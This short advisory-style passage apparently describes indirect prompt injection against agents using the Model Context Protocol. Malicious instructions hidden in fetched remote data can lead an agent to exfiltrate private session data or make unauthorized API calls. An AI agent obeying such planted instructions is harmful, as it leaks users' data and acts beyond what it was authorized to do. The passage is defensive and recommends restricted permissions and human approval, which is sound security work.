Researchers have identified a new class of Prompt Injection attacks targeting AI agents that utilize the Model Context Protocol (MCP). By embedding malicious instructions in remote data sources that an agent is configured to fetch, attackers can force the agent to exfiltrate private session data or execute unauthorized API calls. Unlike standard LLM chat interfaces, MCP-enabled agents have direct hooks into local environments, making the impact of 'Indirect Prompt Injection' significantly more severe. Organizations should strictly limit the permissions of MCP servers and implement human-in-the-loop approvals for sensitive tool execution.